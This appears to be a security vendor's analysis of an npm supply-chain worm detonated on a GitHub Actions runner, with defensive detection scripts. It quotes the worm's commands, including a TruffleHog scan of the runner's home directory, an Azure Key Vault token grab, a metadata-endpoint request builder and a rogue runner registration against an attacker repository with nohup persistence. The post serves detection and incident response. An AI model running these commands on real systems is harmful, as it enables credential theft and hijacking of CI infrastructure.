An npm install against a compromised package ran for over an hour on a GitHub Actions runner. In the runtime record, the lineage pivoted from Node to Bun, scanned /home/runner with TruffleHog, probed cloud metadata, and attempted rogue runner registration. One install generated the full chain, and the kernel trace preserves it end to end.

The campaign, dubbed "The Second Coming", executes during install-time lifecycle hooks — before the dependency graph is fully settled. The dropper installs the Bun runtime to escape Node-centric tooling, then runs a large obfuscated payload that harvests npm tokens, GitHub PATs, and cloud credentials. Unit 42 noted the scripts were likely LLM-assisted; Microsoft published Defender guidance for detection and investigation.
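As a rough pre-install audit, a dependency tree's package.json manifests can be scanned for install-time lifecycle hooks before anything runs. A minimal sketch (the helper name and result shape are illustrative, not part of any npm tooling):

```python
import json
from pathlib import Path

# npm runs these scripts automatically during `npm install`
# unless --ignore-scripts is set.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

def find_install_hooks(root):
    """Walk a tree of package.json files and list install-time scripts."""
    hits = []
    for manifest in sorted(Path(root).rglob("package.json")):
        try:
            scripts = json.loads(manifest.read_text()).get("scripts", {})
        except (json.JSONDecodeError, OSError):
            continue
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                hits.append((str(manifest), hook, scripts[hook]))
    return hits
```

Running this against a vendored node_modules tree, or installing with `npm install --ignore-scripts` and auditing before a second scripted pass, surfaces exactly the hook class this campaign abuses.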
That is the artifact-and-victim story — reconstructed from logs and post-mortems after the damage was done. What follows is the runtime tape: what the worm actually does on a runner, second by second, under kernel-level observation.
What Garnet observed
Method: controlled detonation of @seung-ju/react-native-action-sheet@0.2.1 in garnet-labs/product-testing ("Install from npmjs" workflow) on a GitHub Actions runner instrumented with Garnet's eBPF sensor (run_id: 19750364519). The summarized profile shows 14 outbound destinations with 2 flagged egress leaves (169.254.169.254 and api.tomorrow.io).
Execution lineage
Run 19750364519 · garnet-labs/product-testing
Install from npmjs
The lineage above shows the full ancestry from npm install to every technique the worm uses. The preinstall hook fires sh -c "node setup_bun.js", which downloads the Bun runtime (bun.sh), stages it under ~/.dev-env/, and hands execution to bun bun_environment.js. From that point, most Node-only instrumentation goes blind — the heavy work no longer runs inside the Node/V8 process tree. Kernel-level ancestry does not care which interpreter won; it still sees every child process and socket. Garnet fires interpreter_shell_spawn on the pivot.
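The pivot itself has a detectable shape in exec telemetry: a child of the Node/npm chain executing a different runtime. A minimal sketch over simplified exec events (the event type, field names, and runtime lists here are illustrative, not Garnet's schema):

```python
from dataclasses import dataclass

@dataclass
class ExecEvent:
    pid: int
    ppid: int
    exe: str  # basename of the executed binary

# Parents we expect in an npm install chain, and runtimes whose
# appearance under that chain is worth flagging. Both sets are
# illustrative starting points.
NODE_CHAIN = {"npm", "node", "sh"}
OTHER_RUNTIMES = {"bun", "deno", "python3"}

def find_interpreter_pivots(events):
    """Flag exec events where a Node-chain parent spawns another runtime."""
    by_pid = {e.pid: e for e in events}
    pivots = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and parent.exe in NODE_CHAIN and e.exe in OTHER_RUNTIMES:
            pivots.append(e)
    return pivots
```

Fed the lineage above (npm → sh → node → bun), this flags the bun exec; a Node-only APM agent sees nothing at that point.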
Credential harvesting and validation
Under Bun, the worm downloads TruffleHog (~/.truffler-cache/trufflehog_3.91.1_linux_amd64) and runs it against the entire runner home directory:
trufflehog filesystem /home/runner --json
TruffleHog does not merely find secrets — it validates them against live APIs. The execution lineage shows egress from this process to keychecker.trufflesecurity.com (TruffleHog's own verification backend), api.cloudflare.com, api.aiven.io, api.box.com, github.com, and gitlab.com (both SSH on port 22 and HTTPS on 443). Each destination is a credential verification attempt for a different service. Telemetry showed periodic re-scanning on a rough beat (on the order of tens of minutes), consistent with waiting for late-arriving tokens mid-workflow rather than a one-shot harvest.
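TruffleHog's `--json` mode emits one finding per line, with a `Verified` flag on secrets it confirmed against a live API. A small triage sketch, assuming that field layout (the two-bucket split is the illustrative part):

```python
import json

def triage(jsonl):
    """Split TruffleHog JSON-lines output into verified and unverified findings.

    Field names ("Verified", "DetectorName") follow TruffleHog v3's JSON
    output; this is a rough triage pass, not a complete parser.
    """
    verified, unverified = [], []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        finding = json.loads(line)
        bucket = verified if finding.get("Verified") else unverified
        bucket.append(finding.get("DetectorName", "unknown"))
    return verified, unverified
```

The same split the attacker relies on (verified findings are the immediately usable ones) works for defenders prioritizing rotation after an incident.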
Cloud credential theft
In parallel with the secret scan, the worm targets cloud identity. The lineage shows two paths into Azure credentials — CLI and PowerShell:
az account get-access-token --output json --resource https://vault.azure.net
pwsh -Command "Import-Module Az.Accounts"
The Azure CLI command requests a Managed Identity token scoped for Key Vault — if the runner has one, the attacker does not need to find secrets on disk; Azure hands them over directly. An outbound probe to 169.254.169.254:80 (visible as a leaf destination in the lineage) is the classic instance metadata grab for temporary cloud credentials. These commands are dual-use in real CI; ancestry (child of npm install / Bun dropper) and clustering are what make them suspicious here.
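For reference, the metadata grab needs nothing more than one HTTP GET. On Azure, the IMDS identity endpoint returns a Managed Identity token to any process on the host that sends the `Metadata: true` header; endpoint and header below follow Azure's IMDS documentation, and the sketch only builds the request rather than sending it:

```python
from urllib.parse import urlencode

# Azure Instance Metadata Service identity endpoint (link-local,
# unauthenticated, reachable from any process on the VM).
IMDS_BASE = "http://169.254.169.254/metadata/identity/oauth2/token"

def build_imds_token_request(resource):
    """Return the (url, headers) pair for an IMDS token request."""
    query = urlencode({"api-version": "2018-02-01", "resource": resource})
    return f"{IMDS_BASE}?{query}", {"Metadata": "true"}
```

With `resource="https://vault.azure.net"` this is the same token the `az` command above asks for, which is why flows to 169.254.169.254 from an install-time process tree deserve a flag regardless of which tool made them.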
Infrastructure capture
The worm does not stop at secrets — it wants compute. Visible in the lineage as the config.sh branch, the worm downloads the official GitHub Actions runner binary (from objects.githubusercontent.com), registers it unattended against an attacker-controlled repository, and backgrounds the listener:
RUNNER_ALLOW_RUNASROOT=1 ./config.sh \
--url https://github.com/Cpreet/lr8su68xsi5ew60p6k \
--unattended \
--token AJLWEOHS55OZFARDGWZFUZDJFD3XW \
--name "SHA1HULUD"
nohup ./run.sh &
The execution lineage shows a rogue Runner.Listener process spawning under config.sh, connecting to github.com to complete registration. Garnet fires hidden_elf_exec — execution from the hidden ~/.dev-env/ directory. A successful registration yields a programmable node inside the victim's perimeter that persists after the workflow step completes. The nohup ./run.sh branch in the lineage — orphaned from the original install process — is the persistence mechanism.
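One concrete response is to audit a repository's registered self-hosted runners against an expected set, via GitHub's REST endpoint `GET /repos/{owner}/{repo}/actions/runners` (requires a token with admin access to the repo). A sketch, where the expected-name set is something you maintain yourself:

```python
import json
from urllib.request import Request, urlopen

def fetch_runners(owner, repo, token):
    """List self-hosted runners registered on a repo via the GitHub REST API."""
    req = Request(
        f"https://api.github.com/repos/{owner}/{repo}/actions/runners",
        headers={
            "Authorization": f"Bearer {token}",
            "Accept": "application/vnd.github+json",
        },
    )
    with urlopen(req) as resp:
        return json.load(resp).get("runners", [])

def flag_unexpected(runners, expected_names):
    """Return names of runners that are not in the expected set."""
    return [r["name"] for r in runners if r["name"] not in expected_names]
```

A runner name you do not recognize, like the "SHA1HULUD" registration above, is grounds for immediate deregistration and credential rotation.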
Egress
Of the roughly 200 flows in the run, most map to TruffleHog validation endpoints or standard CI infrastructure. One destination — api.tomorrow.io:443 (104.18.28.42), a Cloudflare-fronted weather API — had no legitimate role in the job. The lineage shows an outbound flow to api.tomorrow.io from a process inside the payload tree — a destination this job had no reason to reach.
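Flagging that kind of destination reduces to diffing observed flows against a per-workflow baseline. An illustrative sketch, with a hand-written allowlist standing in for a baseline that would in practice be learned from known-good runs:

```python
# Illustrative allowlist: destinations a plain `npm install` job on GitHub
# Actions plausibly needs. A real baseline is built per workflow.
KNOWN_GOOD = {
    "registry.npmjs.org",
    "github.com",
    "api.github.com",
    "objects.githubusercontent.com",
}

def flag_egress(flows):
    """flows: iterable of (destination_host, port) tuples.
    Returns the sorted set of destinations outside the baseline."""
    return sorted({f for f in flows if f[0] not in KNOWN_GOOD})
```

Against this run's flow log, both the metadata probe and the weather-API flow fall outside the baseline, while the TruffleHog validation endpoints would need explicit triage entries of their own.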
An npm install, via a lifecycle hook, ended up registering infrastructure. CI is one place this untrusted-execution problem becomes obvious, because install-time hooks run with immediate access to secrets and network. The same visibility gap shows up anywhere teams execute code they did not author — from AI agent sandboxes to transitive runtime dependencies. Here, kernel-level lineage is what turns a noisy chain into attributable behavior.
Real-world impact
Even after malicious versions are pulled from npm, self-hosted runner registration means attackers can retain a foothold independent of the poisoned package. The campaign's scale — 487 organizations and 14,206 exposed secrets in 72 hours per Check Point — reflects how quickly install-time execution scales across automation. Months later, the same structural gap — code executing inside CI with full secrets access and no kernel-level audit trail — recurred across Trivy, KICS, LiteLLM, Telnyx, and axios.
Explore the execution lineage yourself in the profile above, or start observing your own workflows with Garnet.